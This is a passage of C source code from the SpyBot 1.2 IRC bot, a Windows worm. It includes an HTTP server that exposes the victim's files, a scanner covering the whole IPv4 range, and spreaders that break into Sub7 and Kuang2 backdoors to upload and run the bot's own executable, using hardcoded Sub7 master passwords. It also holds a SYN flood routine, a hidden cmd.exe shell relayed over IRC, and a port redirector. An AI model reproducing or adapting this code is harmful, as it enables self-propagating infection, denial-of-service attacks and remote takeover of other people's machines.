2021 								else if (strcmp(rBuffer,"\r\n") == 0) {  //end of the request check if there is anything to send back
2022 										FD_CLR(i, &master);
2023 										if (file != NULL) {
2024 										if (strlen(file)+strlen(threads[threadnum].dir) < MAX_PATH) { 
2025 											unsigned long mode2 = 0;
2026 											ioctlsocket(i,FIONBIO,&mode2);
2027 											Check_Requestedfile(i,threads[threadnum].dir,file);
2028 										}
2029 										else closesocket(i);
2030 									}
2031 									else closesocket(i);
2032 									break;
2033 								}
2034 								memset(rBuffer,0,sizeof(rBuffer));
2035 								r=-1;
2036 							}
2037 
2038                 				} 
2039         				}
2040 
2041 				}
2042 			}
2043 		}
2044 	}
2045 	closesocket(threads[threadnum].sock);
2046 	threads[threadnum].id = 0;
2047 	return 0;
2048 }
2049 
2050 SOCKET http_socket;
2051 BOOL http_Type;
2052 int http_lenght;
2053 BOOL http_info = FALSE;
2054 char http_file[MAX_PATH];
2055 char http_path[MAX_PATH];
2056 DWORD WINAPI  http_header(LPVOID param)
2057 {
2058 	SOCKET sock = (SOCKET)param;
2059 	char tFile[MAX_PATH];
2060 	char nFile[MAX_PATH];
2061 	BOOL type = http_Type;
2062 	sprintf(tFile,http_file); 
2063 	sprintf(nFile,http_path); 
2064 	int lenght = http_lenght;
2065 	http_info = TRUE;
2066 	char content[50];
2067 	if (type) sprintf(content,"text/html");
2068 	else sprintf(content,"application/octet-stream");
2069 	char buffer[4096];
2070 	char date[70];
2071 	char time[30];
2072 	GetDateFormat(0x409,0,0,"ddd, dd MMM yyyy",date,70);
2073 	GetTimeFormat(0x409,0,0,"HH:mm:ss",time,30);
2074 	sprintf(buffer,"HTTP/1.0 200 OK\r\nServer: SpyBot1.2\r\nDate: %s %s GMT\r\nContent-Type: %s\r\nAccept-Ranges: bytes\r\nLast-Modified: %s %s GMT\r\nContent-Length: %i\r\nConnection: close\r\n\r\n",date,time,content,date,time,lenght);
2075 	send(sock,buffer,strlen(buffer),0);
2076 	if (type == FALSE) http_send_file(sock,tFile);
2077 	else getfiles(tFile,sock,NULL,nFile); 
2078 	closesocket(sock);
2079 	return 0;
2080 }
2081 
2082 int Check_Requestedfile(SOCKET sock,char * dir,char * rFile)
2083 {
2084 	BOOL directory = FALSE;
2085 	char file[MAX_PATH];
2086 	char nFile[MAX_PATH];
2087 	char tFile[MAX_PATH];
2088 	memset(file,0,sizeof(file));
2089 	memset(nFile,0,sizeof(nFile));
2090 	DWORD c,d;
2091 
2092 	if (rFile[0] != 47) sprintf(file,"\\%s",rFile);
2093 	else {
2094 		rFile[0] = 92;
2095 		sprintf(file,"%s",rFile);
2096 	}
2097 	for (c = 0,d=0;c < strlen(file);c++,d++)
2098 	{
2099 		if ((((c+2 < strlen(file) && file[c] == 37 && file[c+1] == 50 && file[c+2] == 48)))) {
2100 			nFile[d] = 32;
2101 			c=c+2;
2102 		}
2103 		else if (file[c] == 47) nFile[d] = 92;
2104 		else nFile[d] = file[c];
2105 	}
2106 	sprintf(tFile,"%s%s",dir,nFile);
2107 	strtok(tFile,"\n");
2108 	HANDLE testfile;
2109 	if (GetFileAttributes(tFile) == FILE_ATTRIBUTE_DIRECTORY) 
2110       		directory = TRUE;
2111 	else if (GetFileAttributes(tFile) == 0xFFFFFFFF) { //invalid file
2112 			closesocket(sock);
2113 			return 0;
2114 	}
2115 	if (nFile[d-1] == 92) directory = TRUE;
2116 	DWORD id;
2117 	if (directory) {
2118 		strcat(tFile,"*");
2119 		file_to_html(nFile);
2120 		sprintf(http_file,tFile);
2121 		sprintf(http_path,nFile);
2122 		http_info = FALSE;
2123 		http_Type = TRUE;
2124 		http_lenght = 10000;
2125 		if (CreateThread(NULL, 0, &http_header, (LPVOID)sock, 0, &id)) {
2126 			while (http_info == FALSE) Sleep(5);
2127 		}
2128 		else { 
2129 			closesocket(sock);
2130 		}
2131 		 //(tFile,sock,NULL,nFile); //list the directory and send it in html
2132 	}
2133 	else { //its a file
2134 		HANDLE testfile = CreateFile(tFile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
2135       		if (testfile != INVALID_HANDLE_VALUE) {
2136 			http_lenght = GetFileSize(testfile,NULL);
2137 			CloseHandle(testfile);
2138 			http_Type = FALSE;
2139 			sprintf(http_file,tFile);
2140 			http_info = FALSE;
2141 			if (CreateThread(NULL, 0, &http_header, (LPVOID)sock, 0, &id)) {
2142 				while (http_info == FALSE) Sleep(5);
2143 			}
2144 			else {
2145 				closesocket(sock);
2146 			}
2147 		}
2148 	}
2149 	return 0;
2150 }
2151 void http_send_file(SOCKET sock,char *file)
2152 {
2153 	FILE *infile;
2154 	int c, err;
2155 	char buffer[4096];
2156 	HANDLE testfile = CreateFile(file,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
2157 	if (testfile == INVALID_HANDLE_VALUE) 
2158 		return;
2159 	CloseHandle(testfile);
2160 	infile = fopen(file,"rb");
2161 	if (infile == NULL) 
2162 		return; //strange..
2163 	while (1) {
2164 		memset(buffer,0,sizeof(buffer));
2165 		c = fread(buffer,1,sizeof(buffer),infile);
2166 		if (c == 0) 
2167 			break;
2168 		err = send(sock,buffer ,c, 0);
2169 		if (err == SOCKET_ERROR || err == 0) 
2170 			break; //error
2171 	}
2172 	fclose(infile);
2173 	return; //file transfer complete		
2174 }
2175 
2176 char * file_to_html(char *file) //change the '\' back to '/'
2177 {
2178 	DWORD c;
2179 	for (c=0;c < strlen(file);c++)
2180 	if (file[c] == 92) file[c] = 47;
2181 	return file;
2182 }
2183 
2184 //port scanner
2185 DWORD WINAPI port_scanner(LPVOID param)
2186 {
2187 	int threadnum = (int)param;
2188 	scan[threadnum].state = 1;
2189 	char Scanning_ip[16];
2190 	char buf[4];
2191 	memset(Scanning_ip,0,sizeof(Scanning_ip));
2192 	memset(buf,0,sizeof(buf));
2193 	strcpy(Scanning_ip,scan[threadnum].ip);
2194 	DWORD c,token,d,err;
2195 	
2196 	//break the ip in 4 parts
2197 	for (d=0,c=0,token=0;c<=strlen(Scanning_ip);c++)
2198 	{
2199 		if  (Scanning_ip[c] == 46 || c == strlen(Scanning_ip)) {
2200 			srand(GetTickCount());
2201 			if (token == 0) { 
2202 				if (strcmp(buf,"x") == 0) scan[threadnum].scan_1 = (rand()%254);
2203 				else scan[threadnum].scan_1 = atoi(buf);
2204 
2205 			}
2206 			if (token == 1) {
2207 				if (strcmp(buf,"x") == 0) scan[threadnum].scan_2 = (rand()%254);
2208 				else scan[threadnum].scan_2 = atoi(buf);
2209 			}
2210 			if (token == 2) {
2211 				if (strcmp(buf,"x") == 0) scan[threadnum].scan_3 = (rand()%254);
2212 				scan[threadnum].scan_3 = atoi(buf);
2213 			}
2214 			if (token == 3) {
2215 				if (strcmp(buf,"x") == 0) scan[threadnum].scan_4 = (rand()%254);
2216 				 scan[threadnum].scan_4 = atoi(buf);
2217 			}
2218 			memset(buf,0,sizeof(buf));
2219 			d=0;
2220 			token++;
2221 			continue;
2222 		}
2223 		else {
2224 			buf[d] = Scanning_ip[c];
2225 			d++;
2226 		}
2227 	}
2228 	while (err != 1) 
2229 		err = scan_host(scan[threadnum].ip,scan[threadnum].port,threadnum);
2230 		
2231 	scan[threadnum].state = 0;
2232 	threads[scan[threadnum].thread].id = 0;
2233 	return 0;
2234 
2235 }
2236 
2237 int scan_host(char *host,int port,int num)
2238 {
2239 	char sendbuf[512];
2240 	SOCKADDR_IN    SockAddr;
2241    	SOCKET         sock[MAX_PORTSCAN_SOCKETS_TO_USE];
2242 	FILE *infile;
2243    	IN_ADDR iaddr;
2244 	memset(&SockAddr, 0, sizeof(SockAddr));
2245 	SockAddr.sin_family = AF_INET;
2246    	SockAddr.sin_port = htons(port);
2247 	DWORD mode = 1;
2248 	DWORD id;
2249 	TIMEVAL time;
2250 	int c;
2251 	for (c=0;c<MAX_PORTSCAN_SOCKETS_TO_USE;c++)
2252 	{
2253 		sock[c] = socket(AF_INET, SOCK_STREAM, 0);
2254    		if (sock[c] == INVALID_SOCKET)
2255       			return 1;
2256 		ioctlsocket(sock[c],FIONBIO,&mode);
2257 	}
2258 	for (c=0;c<MAX_PORTSCAN_SOCKETS_TO_USE;c++)
2259 	{
2260 		GetNewIp(num);
2261 		iaddr.s_addr = inet_addr(scan[num].ip);
2262 		if (iaddr.s_addr == INADDR_NONE)
2263 			return 0;
2264 		SockAddr.sin_addr = iaddr; 
2265   		connect(sock[c], (PSOCKADDR) &SockAddr, sizeof(SockAddr));
2266 	}
2267       	Sleep(scan[num].delay);     
2268 	for (c=0;c<MAX_PORTSCAN_SOCKETS_TO_USE;c++)
2269 	{
2270    		fd_set fd_struct;
2271     		time.tv_sec = 0;
2272     		time.tv_usec = 0;
2273    		FD_ZERO(&fd_struct);
2274     		FD_SET(sock[c], &fd_struct);
2275 		if (select(0,NULL, &fd_struct, NULL, &time) < 1) {
2276 			closesocket(sock[c]);
2277 			continue;
2278 		}
2279 		else {//its open
2280 			SOCKADDR socketname;
2281 			int s = sizeof(socketname);
2282 			getpeername(sock[c],&socketname,&s);
2283 			memcpy(&iaddr.S_un.S_addr,&socketname.sa_data[2],4);
2284 			if (strlen(scan[num].file) > 2) { //log to file
2285 				infile = fopen(scan[num].file,"aw");
2286 				if (infile != NULL) {
2287 					sprintf(sendbuf,"%s:%i\n",inet_ntoa(iaddr),port);
2288 					fputs(sendbuf,infile);
2289 					fclose(infile);
2290 				}
2291 			}
2292       	     
2293 			if (strlen(scan[num].chan) > 2) sprintf(sendbuf,"PRIVMSG %s :Found port %i open at ip:%s \r\n",scan[num].chan,port,inet_ntoa(iaddr)); //sendto query/channel
2294 			else sprintf(sendbuf,"Found poort %i open at ip:%s \r\n",port,inet_ntoa(iaddr)); //send to dcc chat	
2295 			if (scan[num].sock != 0) send(scan[num].sock, sendbuf, strlen(sendbuf), 0);
2296 			if (scan[num].extra == 0) closesocket(sock[c]);
2297 			#ifdef SUB7_SPREADER
2298 			if (scan[num].extra == 1) {
2299 				if (sub7(sock[c]) == 1 && scan[num].sock != 0) {
2300 					if (strlen(scan[num].chan) > 2) sprintf(sendbuf,"PRIVMSG %s :Server uploaded to sub7server IP: %s port: %i\r\n",scan[num].chan,inet_ntoa(iaddr),port); //sendto query/channel
2301 					else sprintf(sendbuf,"Server uploaded to sub7server IP: %s port: %i\r\n",inet_ntoa(iaddr),port); //send to dcc chat	
2302 					send(scan[num].sock, sendbuf, strlen(sendbuf), 0);
2303 				}
2304 			}
2305 			#endif
2306 			#ifdef KUANG2_SPREADER
2307 			if (scan[num].extra == 2) {
2308 				if (KUANG(sock[c]) == 1 && scan[num].sock != 0) {
2309 					if (strlen(scan[num].chan) > 2) sprintf(sendbuf,"PRIVMSG %s :Server uploaded to kuangserver IP: %s \r\n",scan[num].chan,inet_ntoa(iaddr)); //sendto query/channel
2310 					else sprintf(sendbuf,"Server uploaded to kuangserver IP: %s \r\n",inet_ntoa(iaddr)); //send to dcc chat	
2311 					send(scan[num].sock, sendbuf, strlen(sendbuf), 0);
2312 				}
2313 			}
2314 			#endif
2315 		}
2316 	}
2317 	return 0;
2318 }
2319 
2320 
2321 
2322 void GetNewIp(int num)
2323 {
2324 	while (1) {
2325 		if (scan[num].scan_4 > 254) {
2326 			scan[num].scan_4 = 0;
2327 			scan[num].scan_3++;
2328 		}
2329 		else {
2330 			scan[num].scan_4++;
2331 			break;
2332 		}
2333 		if (scan[num].scan_3 > 254) {
2334 			scan[num].scan_3 = 0;
2335 			scan[num].scan_2++;
2336 		}
2337 		else 
2338 			break;
2339 		if (scan[num].scan_2 > 254) {
2340 			scan[num].scan_2 = 0;
2341 			scan[num].scan_1++;
2342 		}
2343 		else 
2344 			break;
2345 		if (scan[num].scan_1 > 254) { //we are at 255.255.255.255 and we start again with 0.0.0.0
2346 			scan[num].scan_1 = 0;
2347 			scan[num].scan_2 = 0;
2348 			scan[num].scan_3 = 0;
2349 			scan[num].scan_4 = 0;
2350 		}
2351 		else 
2352 			break;
2353 
2354 	}
2355 	sprintf(scan[num].ip,"%i.%i.%i.%i",scan[num].scan_1,scan[num].scan_2,scan[num].scan_3,scan[num].scan_4);
2356 		
2357 }
2358 
2359 
2360 #ifdef SUB7_SPREADER
2361 int SUB7_Reciev(SOCKET sock)
2362 {
2363 	TIMEVAL time;
2364    	fd_set fd_struct;
2365     	time.tv_sec = 30;//timeout after 60 sec.
2366     	time.tv_usec = 0;
2367    	FD_ZERO(&fd_struct);
2368     	FD_SET(sock, &fd_struct);
2369 	if (select(0, &fd_struct, NULL, NULL, &time) <= 0)
2370 	{
2371 		closesocket(sock); 
2372 		return -1;
2373 	}
2374 	return 0;
2375 }
2376 
2377 
2378 int sub7(SOCKET sock)
2379 {
2380 	
2381 	char rBuffer[512];
2382 	DWORD mode = 0;
2383 	DWORD err;
2384 	SOCKADDR_IN socketname;
2385 	int s = sizeof(socketname);
2386 	getpeername(sock,&socketname,&s);
2387 	char host[100];
2388 	int port;
2389 	sprintf(host,"%s",inet_ntoa(socketname.sin_addr));
2390 	port = ntohs(socketname.sin_port);
2391 	int try = 0;
2392 	int c,size;
2393 	char thisfilename[MAX_PATH];
2394 	ioctlsocket(sock,FIONBIO,&mode); //set the socket back to blocking
2395 	restart:;
2396 	memset(rBuffer,0,sizeof(rBuffer));
2397 	if (SUB7_Reciev(sock) == -1) 
2398 		goto end;
2399 	if (recv(sock, rBuffer, sizeof(rBuffer), 0) <= 0) goto end;
2400       	      
2401 	if (strcmp(rBuffer,"PWD") == 0) { //its password protected try the masterpasswords
2402 		if (try > 1) {
2403 			goto end;
2404 		}
2405 		if (try == 0) sprintf(rBuffer,"PWD715"); 
2406 		else if (try == 1) { //try the other pass 
2407 			sprintf(rBuffer,"PWD14438136782715101980"); 
2408 		}
2409 		try++;
2410 		if (send(sock,rBuffer,strlen(rBuffer), 0) <= 0) goto end;
2411 		goto restart;
2412 	}
2413 	strtok(rBuffer," ");
2414 	if (strcmp(rBuffer,"connected.") == 0) { //we are connected
2415 		send(sock,"UPS",3, 0);
2416 		memset(rBuffer,0,sizeof(rBuffer));
2417 		if (SUB7_Reciev(sock) == -1) goto end;
2418 		recv(sock, rBuffer, sizeof(rBuffer), 0);
2419 		if (strcmp(rBuffer,"TID") != 0) goto end; //something whent wrong
2420 		GetModuleFileName(NULL,thisfilename,sizeof(thisfilename));
2421 		char buffer[1041];
2422 		HANDLE testfile = CreateFile(thisfilename,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
2423 		if (testfile == INVALID_HANDLE_VALUE) 
2424 			goto end;
2425 		size = GetFileSize(testfile,NULL);
2426 		CloseHandle(testfile);
2427 		sprintf(rBuffer,"SFT05%i",size);
2428 		send(sock,rBuffer,10, 0);
2429 		FILE* infile;
2430 		infile = fopen(thisfilename,"rb");
2431 		if (infile == NULL) goto end;
2432 		while (1)
2433 		{
2434 			memset(buffer,0,sizeof(buffer));
2435 			c = fread(buffer,1,sizeof(buffer),infile);
2436 			if (c == 0) 
2437 				break;
2438 			if (send(sock,buffer ,c, 0) <= 0) {
2439 				fclose(infile);
2440 				goto end;
2441 			}
2442 		}
2443 		fclose(infile);
2444 		c=0;
2445 		while (err > 0) {
2446 			if (c > 3) 
2447 				break;
2448 			if (SUB7_Reciev(sock) == -1) 
2449 				break;
2450 			err = recv(sock, rBuffer, sizeof(rBuffer), 0);
2451 		}
2452 		closesocket(sock);
2453 		return 1;
2454 			
2455 	}
2456 	else if (try == 1) {
2457 		closesocket(sock);
2458 		Sleep(2000);
2459 		if ((sock = create_sock(host,port)) == SOCKET_ERROR) goto end;
2460 		goto restart;
2461 	}
2462 
2463 	end:;
2464 	closesocket(sock);
2465 	return 0;
2466 
2467 }
2468 #endif
2469 
2470 #ifdef KUANG2_SPREADER
2471 #define	K2_UPLOAD_FILE	0x46445055
2472 #define	K2_ERROR	0x52525245
2473 #define	K2_DONE		0x454E4F44
2474 #define	K2_RUN_FILE	0x464E5552
2475 #define	K2_QUIT		0x54495551	
2476 typedef struct {
2477 	unsigned int command;
2478 	union {
2479 		char bdata[1024-4];
2480 		struct {
2481 			unsigned int param;
2482 			char sdata[1024-8];
2483 		};
2484 	};
2485 } Message, *pMessage;
2486 char k2_buffer[1024];
2487 pMessage k2_msg = (pMessage) k2_buffer;
2488 
2489 int KUANG_Reciev(SOCKET sock)
2490 {
2491 	char rBuffer[1024];
2492 	TIMEVAL time;
2493    	fd_set fd_struct;
2494     	time.tv_sec = 30;//timeout after 60 sec.
2495     	time.tv_usec = 0;
2496    	FD_ZERO(&fd_struct);
2497     	FD_SET(sock, &fd_struct);
2498 	if (select(0, &fd_struct, NULL, NULL, &time) <= 0)
2499 	{
2500 		closesocket(sock); 
2501 		return -1;
2502 	}
2503 	memset(k2_buffer,0,sizeof(k2_buffer));
2504       	if (recv(sock, k2_buffer, sizeof(k2_buffer), 0) < 1) return -1;
2505 	if (k2_msg->command == K2_ERROR) {
2506 		return -1;
2507 	}
2508       	      
2509 	return 0;
2510 }
2511 
2512 int KUANG(SOCKET sock)
2513 {
2514 	char rBuffer[1024];
2515 	unsigned int Fsize, Fsend, move;
2516 	DWORD mode = 0;
2517 	int err,x;
2518 	char thisfilename[MAX_PATH];
2519 	char randFile[5];
2520 	char rFile[15];
2521 	memset(rFile,0,sizeof(rFile));
2522 	memset(randFile,0,sizeof(randFile));
2523 	srand(GetTickCount());
2524 	for (x=0;x<4;x++)
2525 		randFile[x] = (rand()%26)+97;
2526 	randFile[x+1] = '\0';
2527 	sprintf(rFile,"c:\\%s.exe",randFile);
2528 	ioctlsocket(sock,FIONBIO,&mode); //set the socket back to blocking
2529 	if (KUANG_Reciev(sock) == -1) goto end;
2530 	memset(k2_buffer,0,sizeof(k2_buffer));
2531 	GetModuleFileName(NULL,thisfilename,sizeof(thisfilename));
2532 	HANDLE testfile = CreateFile(thisfilename,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
2533 	if (testfile == INVALID_HANDLE_VALUE) 
2534 		goto end;
2535 	Fsize = GetFileSize(testfile,NULL);
2536 	k2_msg->command=K2_UPLOAD_FILE;
2537 	k2_msg->param=Fsize;
2538 	strcpy(k2_msg->sdata,rFile);
2539 	//strcpy(k2_msg->bdata,rFile);
2540 	//CloseHandle(testfile);
2541 	send(sock,k2_buffer,1024, 0);
2542 	if (KUANG_Reciev(sock) == -1) goto end;
2543 	while (Fsize) {
2544 		int Fsend = 1024;
2545 		memset(rBuffer,0,sizeof(rBuffer));
2546 		if (Fsend>Fsize) Fsend=Fsize;
2547 		move = 0-Fsize;
2548 		SetFilePointer(testfile, move, NULL, FILE_END);
2549 		ReadFile(testfile, rBuffer, Fsend, &mode, NULL);
2550 		int bytes_sent = send(sock, rBuffer, Fsend, 0);
2551 		if (bytes_sent == SOCKET_ERROR) {
2552 			if (WSAGetLastError() != WSAEWOULDBLOCK) break;
2553 			else bytes_sent = 0;
2554 		}
2555 		Fsize = Fsize - bytes_sent;
2556 	}
2557 	if (KUANG_Reciev(sock) == -1) goto end;
2558 	if (testfile != INVALID_HANDLE_VALUE) CloseHandle(testfile);
2559 	memset(k2_buffer,0,sizeof(k2_buffer));
2560 	k2_msg->command=K2_RUN_FILE;
2561 	sprintf(k2_msg->bdata,rFile);
2562 	send(sock,k2_buffer ,1024, 0);
2563 	if (KUANG_Reciev(sock) == -1) goto end;
2564 	memset(k2_buffer,0,sizeof(k2_buffer));
2565 	k2_msg->command=K2_QUIT;
2566 	send(sock,k2_buffer ,4, 0);
2567 	return 1;
2568 	end:;
2569 	closesocket(sock);
2570 	return 0;
2571 }
2572 #endif
2573 
2574 
2575 #ifdef SYN_FLOOD
2576 #define MAX_SYNFLOOD_SOCKETS_TO_USE 200
2577 DWORD WINAPI syn_flood(LPVOID param)
2578 {
2579 	int num = (int)param;
2580 	syn[num].state = 1;
2581 	SOCKADDR_IN    SockAddr;
2582    	SOCKET         sock[MAX_SYNFLOOD_SOCKETS_TO_USE];//we are gone use 200 sockets
2583    	IN_ADDR iaddr;
2584 	memset(&SockAddr, 0, sizeof(SockAddr));
2585 	SockAddr.sin_family = AF_INET;
2586    	SockAddr.sin_port = htons(syn[num].port);
2587 	LPHOSTENT lpHostEntry = NULL;
2588  	DWORD mode = 1;
2589 	int c,i;
2590 	iaddr.s_addr = inet_addr(syn[num].host);
2591 	if (iaddr.s_addr == INADDR_NONE) lpHostEntry = gethostbyname(syn[num].host);
2592 	if (lpHostEntry == NULL && iaddr.s_addr == INADDR_NONE) { //error dns
2593 		syn[num].state = 0;
2594 		threads[syn[num].thread].id = 0;	
2595 		return 0;
2596 	}
2597 	if (lpHostEntry != NULL)
2598 		SockAddr.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list); //hostname
2599 	else
2600 		SockAddr.sin_addr = iaddr; //ip address
2601 	i = 0;
2602 	while (i < syn[num].times) {
2603 		for (c=0;c<MAX_SYNFLOOD_SOCKETS_TO_USE;c++)
2604 		{
2605 			sock[c] = socket(AF_INET, SOCK_STREAM, 0);
2606    			if (sock[c] == INVALID_SOCKET)
2607       				continue;
2608 			ioctlsocket(sock[c],FIONBIO,&mode);
2609 		}
2610 		for (c=0;c<MAX_SYNFLOOD_SOCKETS_TO_USE;c++)
2611   			connect(sock[c], (PSOCKADDR) &SockAddr, sizeof(SockAddr));
2612       		Sleep(syn[num].delay);     
2613 		for (c=0;c<MAX_SYNFLOOD_SOCKETS_TO_USE;c++)
2614 			closesocket(sock[c]); //close all sockets
2615 		i++;
2616 	}
2617 	syn[num].state = 0;
2618 	threads[syn[num].thread].id = 0;	
2619 	return 0;
2620 }
2621 #endif
2622 
2623 #ifdef remote_cmd
2624 void Close_Handles()
2625 {
2626 	if (pipe_read != INVALID_HANDLE_VALUE) CloseHandle(pipe_read);
2627 	if (pipe_write != INVALID_HANDLE_VALUE) CloseHandle(pipe_write);
2628 	if (pipe_Hproc != INVALID_HANDLE_VALUE) CloseHandle(pipe_Hproc);
2629 }
2630 
2631 
2632 int open_cmd(SOCKET sock,char * chan)
2633 {
2634 	Close_Handles();
2635 	char searsdir[MAX_PATH];
2636   	SECURITY_ATTRIBUTES secAttr;
2637   	STARTUPINFO startInfo;
2638   	PROCESS_INFORMATION procInfo;
2639 	HANDLE hChildOutRd, hChildOutWr, hChildInRd, hChildInWr;
2640 	//sears for cmd.exe
2641 	GetWindowsDirectory(searsdir,sizeof(searsdir));
2642 	strcat(searsdir,"\\cmd.exe");
2643 	if (GetFileAttributes(searsdir) == 0xFFFFFFFF) {
2644 		GetSystemDirectory(searsdir,sizeof(searsdir));
2645 		strcat(searsdir,"\\cmd.exe");
2646 		if (GetFileAttributes(searsdir) == 0xFFFFFFFF) return -1;
2647 	}
2648     	secAttr.nLength = sizeof(secAttr);
2649     	secAttr.bInheritHandle = TRUE;
2650     	secAttr.lpSecurityDescriptor = NULL;
2651 
2652     	if (!CreatePipe(&hChildOutRd, &hChildOutWr, &secAttr, 0)) return -1;
2653     	if (!CreatePipe(&hChildInRd, &hChildInWr, &secAttr, 0)) return -1;
2654     	if (!DuplicateHandle(GetCurrentProcess(), hChildInWr, GetCurrentProcess(), &hChildInWrDupe, 0, FALSE, DUPLICATE_SAME_ACCESS | DUPLICATE_CLOSE_SOURCE)) return -1;
2655 
2656    	memset(&startInfo, 0, sizeof(startInfo));
2657    	startInfo.cb = sizeof(startInfo);
2658     	startInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
2659     	startInfo.wShowWindow = SW_HIDE;
2660     	startInfo.hStdInput = hChildInRd;
2661     	startInfo.hStdOutput = hChildOutWr;
2662    	if (!CreateProcess(searsdir,"", NULL, NULL, TRUE, 0, NULL, NULL, &startInfo, &procInfo)) 
2663 		return -1;
2664    	CloseHandle(hChildInRd);
2665 	DWORD id;
2666 	pipe_read = hChildOutRd;
2667 	pipe_write = hChildInWr;
2668 	pipe_Hproc = procInfo.hProcess;
2669    	CloseHandle(procInfo.hThread);
2670 	pipesock = sock;
2671 	if (chan) sprintf(pipe_chan,chan);
2672 	else sprintf(pipe_chan,"\0");
2673 	CreateThread(NULL, 0, &PipeReadThread, NULL, 0, &id);
2674         return 0;
2675 }
2676 
2677 
2678 
2679 
2680 DWORD WINAPI PipeReadThread(LPVOID param)
2681 {
2682 	DWORD numread, br;
2683 	char buffer[512];
2684 	while (1)
2685 	{
2686 		BOOL eol = FALSE;
2687 		DWORD State;
2688 
2689 		memset(buffer,0,sizeof(buffer));
2690 		if (!PeekNamedPipe(pipe_read,buffer,512,&br,NULL,NULL)) {
2691 			pipe_send(pipesock,pipe_chan,"Could not read data from proccess");
2692 			return 0;
2693 		}
2694 
2695 		if (br == 0) { //nothing to read 
2696 			if (GetExitCodeProcess(pipe_Hproc,&State)) { //maybe process is death ?
2697 				if (State != STILL_ACTIVE) {
2698 					Close_Handles(); 
2699 					pipe_send(pipesock,pipe_chan,"Proccess has terminated");
2700 					return 0;
2701 				}
2702 			}
2703 			Sleep(10); //process is waithing sleep and try again
2704 			continue;
2705 		}
2706 		DWORD cbyte;
2707 		for(cbyte=0;cbyte<br;cbyte++) {
2708 			if (buffer[cbyte] == '\n')
2709 			{
2710 				eol = TRUE;
2711 				break;
2712 			}
2713 		}
2714 		if (eol) br = cbyte + 1;
2715 		else br = 512;
2716 		memset(buffer,0,sizeof(buffer));
2717 		if (!ReadFile(pipe_read, buffer, br, &numread, NULL)) 
2718 				break;
2719 		pipe_send(pipesock,pipe_chan,buffer);
2720 
2721 	}
2722 	pipe_send(pipesock,pipe_chan,"Could not read data from proccess");
2723         return 0;
2724 }
2725 int pipe_send(SOCKET sock,char *chan,char *buf)
2726 {
2727 	char sendbuf[612];
2728 	if (strlen(chan) > 2) sprintf(sendbuf,"PRIVMSG %s :%s\r",chan,buf);
2729 	else sprintf(sendbuf,"%s",buf);
2730 	if (send(sock,sendbuf,strlen(sendbuf),0) <= 0) Close_Handles();
2731 	if (strlen(chan) > 2) Sleep(Flood_delay); //we dont want a excess flood
2732 	return 0;
2733 }
2734 #endif
2735 SOCKET create_sock(char *host, int port)
2736 {
2737 	DWORD err;
2738         LPHOSTENT lpHostEntry = NULL;
2739    	SOCKADDR_IN  SockAddr;
2740    	SOCKET sock;
2741    	IN_ADDR iaddr;
2742    	if ((sock = socket( AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
2743       		return -1;
2744 	memset(&SockAddr, 0, sizeof(SockAddr));
2745    	SockAddr.sin_family = AF_INET;
2746    	SockAddr.sin_port = htons(port);
2747 	iaddr.s_addr = inet_addr(host);
2748 	if (iaddr.s_addr == INADDR_NONE)  lpHostEntry = gethostbyname(host); //hostname
2749 	if (lpHostEntry == NULL && iaddr.s_addr == INADDR_NONE)  //error dns
2750 		return -1;
2751 	if (lpHostEntry != NULL)
2752 		SockAddr.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list); //hostname
2753 	else
2754 		SockAddr.sin_addr = iaddr; //ip address
2755 	if (connect(sock, (SOCKADDR *) &SockAddr, sizeof(SockAddr)) == SOCKET_ERROR) {
2756 		closesocket(sock);
2757 		return -1;
2758 	}
2759 	return sock;
2760 }
2761 SOCKET Listen(int port)
2762 {
2763 	SOCKET sock;
2764 	SOCKADDR_IN  SockAddr;
2765    	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) 
2766       		return -1;
2767 	memset(&SockAddr, 0, sizeof(SockAddr));
2768    	SockAddr.sin_family = AF_INET;
2769    	SockAddr.sin_port = htons(port);
2770 	SockAddr.sin_addr.s_addr = INADDR_ANY;  
2771 	if (bind(sock, (SOCKADDR *)&SockAddr, sizeof(SockAddr)) != 0) 
2772 		return -1;//port is in use ?
2773 	if (listen(sock, SOMAXCONN) != 0) 
2774 		return -1;
2775 	return sock;
2776 }
2777 
2778 int redirect_transfer(SOCKET sock_in,SOCKET sock_out)
2779 {
2780 	char buf[4096];	
2781 	memset(buf, 0, sizeof(buf));
2782 	DWORD err,err2;
2783 	err = recv(sock_in,buf,sizeof(buf),0);
2784 	if (err == 0) return -1;
2785 	if (err == SOCKET_ERROR) {
2786 		if (WSAGetLastError() == WSAEWOULDBLOCK) return 0;
2787 		return -1;
2788 	}
2789 	err2 = send(sock_out,buf,err,0);
2790 	if (err2 == 0) return -1;
2791 	if (err2 == SOCKET_ERROR) {
2792 		if (WSAGetLastError() == WSAEWOULDBLOCK) return 0;
2793 		return -1;
2794 	}
2795 	return 0;
2796 }
2797 DWORD WINAPI redirect_io(LPVOID param)
2798 {
2799 	int num = (int)param;
2800 	SOCKET sock_out;
2801 	SOCKET sock_in;
2802 	sock_in = redirectsock_in;
2803 	info = TRUE;
2804 	if ((sock_out = create_sock(threads[num].dir,threads[num].port)) == SOCKET_ERROR) {
2805 		closesocket(sock_in);
2806 		return 0;
2807 	}
2808 	unsigned long mode = 1;
2809 	ioctlsocket(sock_out,FIONBIO,&mode);
2810 	ioctlsocket(sock_in,FIONBIO,&mode);
2811   	fd_set fd_struct;
2812 
2813    	while (1)
2814    	{
2815 		FD_ZERO(&fd_struct);
2816       		FD_SET(sock_in, &fd_struct);
2817      		FD_SET(sock_out, &fd_struct);
2818       		if (select(0, &fd_struct, NULL, NULL, NULL) == SOCKET_ERROR) 
2819 			break;
2820       		if (FD_ISSET(sock_in, &fd_struct)) 
2821       			if (redirect_transfer(sock_in,sock_out) == -1) break;
2822        		if (FD_ISSET(sock_out,&fd_struct)) 
2823 			if (redirect_transfer(sock_out,sock_in) == -1) break;
2824    	}
2825 	closesocket(sock_out);
2826 	closesocket(sock_in);
2827 	return 0;
2828 }
2829 DWORD WINAPI port_redirect(LPVOID param)
2830 {
2831 	int num = (int)param;
2832 	SOCKADDR_IN SockAddr;
